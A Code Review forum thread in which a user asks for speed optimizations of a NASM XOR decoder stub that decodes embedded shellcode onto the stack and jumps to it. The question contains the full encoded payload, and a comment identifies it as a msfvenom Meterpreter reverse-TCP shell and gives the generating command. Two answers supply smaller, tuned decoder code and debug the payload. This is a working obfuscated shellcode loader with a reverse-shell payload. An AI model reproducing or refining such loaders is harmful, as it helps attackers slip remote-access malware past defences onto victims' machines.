Optimizing Netwide Assembler code in Microsoft Windows

Question

I am a novice in assembly programming and would appreciate it if someone could review this NASM code for me. It is an encoder/decoder pair.
The encoder performs the following:

pads the shellcode with NOP opcodes so it is 4-byte aligned
generates a random byte for each 4 bytes of the shellcode
puts the 4 bytes in reverse order and XORs them with that random byte
repeats the process until the 0x9090aaaa marker is reached

Could someone experienced with NASM on Microsoft Windows help optimize this code? The code works but takes a lot of time.

global main

section .text

main:
    jmp short call_shellcode

decoder:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    pop esi             ; address of shellcode
    mov edi, 0xaaaa9090 ; end of shellcode marker
    sub esp, 0x7f       ; make room on the stack (512 bytes)
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack

decode:
    mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
    mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
    mov cl, byte [esi + edx + 3]    ; read 3rd encoded byte
    mov ch, byte [esi + edx + 4]    ; read 4th encoded byte
    xor bl, byte [esi + edx]        ; xor with the key byte
    xor bh, byte [esi + edx]        ; xor with the key byte
    xor cl, byte [esi + edx]        ; xor with the key byte
    xor ch, byte [esi + edx]        ; xor with the key byte
    mov byte [esp + eax], ch        ; store in memory in reverse order to restore original shellcode
    mov byte [esp + eax + 1], cl    ; ..
    mov byte [esp + eax + 2], bh    ; ..
    mov byte [esp + eax + 3], bl    ; ..

    cmp dword [esi + edx + 5], edi  ; check if we have reached the end of shellcode marked
    jz execute_shellcode            ; if we do, jump to the shellcode and execute it
    
    inc edx
    inc edx
    inc edx
    inc edx
    inc edx
    add eax, 4
    jnz decode

execute_shellcode:
    jmp short esp

call_shellcode:
    call decoder
    encoder_shellcode: db 0x71,0x71,0xfe,0x99,0x8d,0x9a,0x13,0xfa,0x9a,0x9a,0x08,0x6c,0xda,0x39,0xed,0x0d,0x86,0x3d,0x5f,0x86,0x6c,0x3e,0xe7,0x60,0x3e,0x8d,0x82,0x72,0xbc,0x99,0x36,0xbd,0x10,0x7c,0x81,0xb0,0x70,0x81,0x98,0xc2,0x43,0x3f,0x22,0x7f,0xef,0xa4,0x65,0x84,0x88,0xa6,0x19,0xde,0x18,0x14,0xd6,0x2d,0x7f,0xc2,0x58,0x64,0xe3,0x68,0xf3,0xb1,0x68,0x39,0xe9,0x38,0x05,0x7b,0x79,0x2e,0x01,0x39,0xf2,0x18,0x54,0x6c,0xd8,0x9d,0x64,0xef,0x34,0xb4,0x65,0xb0,0xe8,0x3b,0xa8,0xf8,0x5c,0xd9,0x8f,0x5d,0x7c,0x75,0x3c,0x49,0x01,0xbc,0x56,0x62,0xdd,0xa9,0x67,0xc8,0xf9,0x1e,0xc9,0x43,0xfa,0x35,0x3b,0x56,0x3a,0xee,0xd6,0x29,0xef,0xe3,0xa9,0xaa,0x5d,0xdc,0x49,0xcf,0xb2,0xf4,0x37,0xb2,0xea,0xb2,0x0a,0x9f,0xce,0x1a,0x1b,0x3e,0x42,0x91,0x8c,0x80,0x07,0xea,0x5f,0xcf,0xd3,0x97,0x44,0x84,0xfa,0xfe,0x71,0x29,0xfb,0xe1,0x68,0x31,0xe0,0x6a,0xf2,0xa9,0xd6,0xd6,0xb6,0x3a,0x60,0x63,0x5b,0x61,0xd3,0x8b,0x33,0x2c,0x82,0xfb,0xe9,0x70,0xa1,0xa4,0x05,0xfa,0xfa,0x85,0xec,0x41,0x72,0x29,0x1c,0xbe,0xe5,0x8d,0xe5,0xe5,0xd7,0x90,0xcf,0xa2,0xe3,0xe7,0x07,0x70,0x4b,0x6f,0x53,0x4f,0xa7,0xc6,0x48,0x69,0xd7,0x47,0x6f,0x07,0x28,0xde,0xf7,0xde,0xde,0xdf,0x98,0xf0,0xc8,0xcc,0x5c,0xba,0xba,0xd1,0x3a,0x93,0x7c,0x76,0x16,0xa9,0x83,0x36,0x0e,0x9e,0xf6,0x5e,0x1f,0x1f,0x1d,0x77,0x1e,0x14,0xf2,0x9d,0x48,0x05,0xea,0xba,0xba,0xba,0xba,0x87,0xd7,0xc7,0xd7,0xc7,0x05,0xda,0x0a,0xef,0x6d,0xb3,0x24,0x66,0x4c,0x53,0x30,0x67,0x66,0x20,0x5a,0xa9,0xdd,0x0c,0x30,0xc1,0x3a,0xbf,0xef,0xc5,0x5b,0xa2,0x5d,0xa8,0xd6,0x62,0x67,0x8b,0x12,0x6f,0x29,0x9e,0x9e,0x9e,0xf9,0x76,0x60,0x0a,0x60,0x0a,0x60,0xbb,0xd3,0xec,0xed,0xbf,0xc6,0x99,0x0e,0x1f,0xc4,0xa2,0x5a,0x21,0x77,0x5d,0x98,0x13,0xae,0xe6,0x98,0xc0,0xa8,0x80,0xaa,0xf6,0x27,0x27,0x27,0x37,0x27,0xd9,0xb1,0xd9,0xb3,0x8f,0x03,0xe6,0x50,0xa7,0x5b,0x6c,0x3f,0xff,0xb9,0x93,0x4a,0x19,0x1c,0x4a,0x20,0x20,0xf9,0x22,0x48,0x77,0x4e,0x9b,0xb1,0x11,0x86,0xf6,0x8b,0xf6,0x0e,0x75,0xa1,0xa1,0xc9,0xf9,0x89,0xbc,0xd6,0xbc,0xbc,0xfc,0x37,0x3c,0x5f,0x67,0x37,0x20,0xdf,0x10,0x2f,0x0f,0x36,0x43,0x5e,0x61,0xe3
    db 0xc2,0x3d,0xa3,0x8f,0xac,0x11,0xee,0x4f,0x4f,0xc4,0x9a,0x1f,0x95,0xbe,0x96,0x79,0x86,0x86,0x86,0x09,0x28,0xd7,0xd7,0xb3,0xc1,0xf7,0xde,0x34,0xf6,0x08,0x8a,0x49,0x4b,0xff,0x4c,0x4a,0xe8,0xff,0xba,0xf1,0xcc,0x9f,0xcc,0xa6,0x9a,0xf4,0x64,0x64,0x21,0x0b,0x90,0x90,0xaa,0xaa


ret

Sorry for the incomplete shellcode. It should have been in NASM format; this is now corrected.

Welcome to Code Review! Is the decoder working as intended now?
– Sᴀᴍ Onᴇᴌᴀ ♦, Commented Aug 28, 2022 at 22:13
Yes, the decoder is working. I only need to optimize it to be faster.
– Ben kubi, Commented Aug 28, 2022 at 22:28

user555045 · Accepted Answer · 2022-08-23 03:41:32Z

For what it is, it looks reasonable to me.

There are some things that could be changed if you want.

Some loads could be merged.
```
mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
```
This pair of loads could be merged into mov bx, word [esi + edx + 1], and the second pair of loads could be merged in the same way.
The five inc edx instructions could be merged into add edx, 5. That affects the flags differently (notably, inc does not affect the carry flag), but that doesn't matter here. It doesn't introduce a nul byte either. Perhaps you avoided it thinking that it might, but then there is an add eax, 4 right after it, so I don't know what happened.
The jnz decode branch is not really a condition: it should always be taken. However, replacing it with jmp would not be an improvement. In fact, that would remove the possibility of macro-fusion between add eax, 4 and the branch. But it does allow a different possibility: rewrite the loop so that the actual exit (which is now jz execute_shellcode) is at the bottom. Moving the adds is not harmful. In other cases, where moving the "second part of the loop body" would be harmful, it can be moved to above the loop entry (resulting in a loop whose entry point is not at the top), but in this case it's simpler than that.
```
decode_loop:
    ; do decoding stuff
    add edx, 5  ; the adds are moved here, to before the cmp
    add eax, 4
    cmp dword [esi + edx], edi  ; no +5 because edx has been increased already
    jnz decode_loop
    jmp short esp
```
Writes to partial registers are subject to various performance quirks (and the occasional erratum fixed with a microcode update), so they are probably best avoided where possible and reasonable. Reads from partial registers are fine, and writes to 32-bit registers in 64-bit code are fine. An alternative approach using 32-bit registers could be to load the key byte (zero-extended into a 32-bit register), splat it to 4 bytes (e.g. imul ecx, ecx, 0x01010101), xor the data bytes with the splatted key, use bswap to implement the byte-reverse, then write out the result. No partial registers are harmed in this procedure. This also reduces code size. Example code:
```
movzx ecx, byte [esi + edx]
imul ecx, ecx, 0x01010101
xor ecx, dword [esi + edx + 1]
bswap ecx
mov dword [esp + eax], ecx
```
There are no nul-bytes in this either, though in general they have a higher chance to appear when not going full 8-bit.
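To make the splat-and-bswap sequence easier to follow, here is a minimal sketch that runs it on a single made-up group and traces the register contents in the comments. The labels sample and result and the byte values are hypothetical and chosen only for illustration; the build setup (nasm -f win32, entry point start, returning with ret) is an assumption as well.

```nasm
global start

section .data
sample: db 0x5A, 0x11, 0x22, 0x33, 0x44   ; hypothetical group: key byte, then 4 data bytes

section .bss
result: resd 1                            ; receives the 4 decoded bytes

section .text
start:
    movzx ecx, byte [sample]        ; ecx = 0x0000005A (key, zero-extended)
    imul  ecx, ecx, 0x01010101      ; ecx = 0x5A5A5A5A (key copied into all 4 bytes)
    xor   ecx, dword [sample + 1]   ; 0x5A5A5A5A xor 0x44332211 = 0x1E69784B
    bswap ecx                       ; ecx = 0x4B78691E (byte order reversed)
    mov   dword [result], ecx       ; bytes in memory: 4B 78 69 1E
    xor   eax, eax                  ; exit code 0
    ret
```

The stored bytes are the four data bytes XORed with the key, in reverse order: the first output byte is 0x11 xor 0x5A = 0x4B and the last is 0x44 xor 0x5A = 0x1E.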

Thanks. I would appreciate it if you could rewrite everything as one complete program.
– Ben kubi, Commented Aug 23, 2022 at 15:59
@Benkubi I did not discover any specific reason why it would not run.
– user555045, Commented Aug 24, 2022 at 4:27

Sep Roland · Accepted Answer · 2022-08-28 23:42:04Z

sub esp, 0x7f       ; make room on the stack (512 bytes)
sub esp, 0x7f       ; make room on the stack
sub esp, 0x7f       ; make room on the stack
sub esp, 0x7f       ; make room on the stack

Did you notice that 4 times 127 equals 508, not 512 as the original comment suggests? Always double-check what other people write.

jmp short esp

This makes NASM issue a warning about having to ignore the size tag. If anything this is a near jump, certainly not a short jump. Best write it as jmp esp.

I reworked the code that you downloaded from https://snowscan.io/custom-encoder/# and got it much smaller (should you care).

Then I assembled it with NASM 2.15.05 using

nasm -f win32 theFile.asm

and linked it with the GoDevTools linker

golink /console theFile.obj

It produced a 1KB executable file.

global start

section .text

start:
    jmp  call_shellcode

decoder:
    pop  esi              ; address of shellcode
    mov  ecx, -508
    imul ecx, -1
    sub  esp, ecx
    mov  edi, esp

decode:
    lodsb                 ; read the key byte
    mov  bl, al
    mov  bh, al
    lodsd                 ; read all 4 encoded bytes
    xor  ax, bx           ; xor 1st and 2nd bytes
    bswap eax
    xor  ax, bx           ; xor 3rd and 4th bytes
    stosd                 ; store reversed
    cmp  dword [esi], 0xAAAA9090
    jne  decode

execute_shellcode:
    jmp  esp

call_shellcode:
    call decoder
    encoder_shellcode: db 0xAA, 0xAA, 0x25, 0x42, 0x56, 0xAA, 0x23, 0xCA, 0xAA, 0xAA, 0xAA, ..., 0x90, 0x90, 0xAA, 0xAA

Needless to say, I did not run the shellcode itself, since it was only partially included in the question as originally posted. So, instead of jumping to the ESP address, I just stopped the program at that point with:

add  esp, ecx      ; restore ESP, ECX=508
xor  eax, eax      ; exitcode
ret
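
As a sanity check on the loop body above, the following sketch traces one pass of the lodsb / lodsd / stosd sequence over a single made-up group. The labels sample and result and the byte values are hypothetical, and the program simply returns instead of jumping anywhere; it assumes the same nasm -f win32 build as above.

```nasm
global start

section .data
sample: db 0x5A, 0x11, 0x22, 0x33, 0x44   ; hypothetical group: key byte, then 4 data bytes

section .bss
result: resd 1                            ; receives the 4 decoded bytes

section .text
start:
    push  ebx                 ; preserve callee-saved registers
    push  esi
    push  edi
    cld                       ; string instructions must move forward
    mov   esi, sample
    mov   edi, result
    lodsb                     ; al = 0x5A (key byte)
    mov   bl, al
    mov   bh, al              ; bx = 0x5A5A
    lodsd                     ; eax = 0x44332211
    xor   ax, bx              ; eax = 0x4433784B (1st and 2nd bytes decoded)
    bswap eax                 ; eax = 0x4B783344
    xor   ax, bx              ; eax = 0x4B78691E (3rd and 4th bytes decoded)
    stosd                     ; bytes in memory: 1E 69 78 4B
    pop   edi
    pop   esi
    pop   ebx
    xor   eax, eax            ; exit code 0
    ret
```

The result is the four data bytes XORed with the key and stored in reverse order, which is the same transform the original byte-by-byte loop performs.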

EDIT

Now that you have included the entire (?) encoded shellcode, I could have a look at it once decoded. I don't understand what it is supposed to do, which is probably for the best, but I can see that the code at some point just falls into the great void!

The final decoded part reads:

      ...

      call 0158

      ...

0158  mov  ebx, 56A2B5F0h
015D  push 0
015F  push ebx
0160  call ebp            ; EBP holds the address of the 7th byte of the shellcode
0162  nop                 ; padded by the encoder
0163  nop                 ; padded by the encoder
0164  ???

The execution of garbage will happen at 0164.

Your optimization is the same as the original. You can try their shellcode to understand my point.
– Ben kubi, Commented Aug 28, 2022 at 21:41
Sorry for the incomplete post. The shellcode is generated by this command: "msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444"
– Ben kubi, Commented Aug 30, 2022 at 12:53
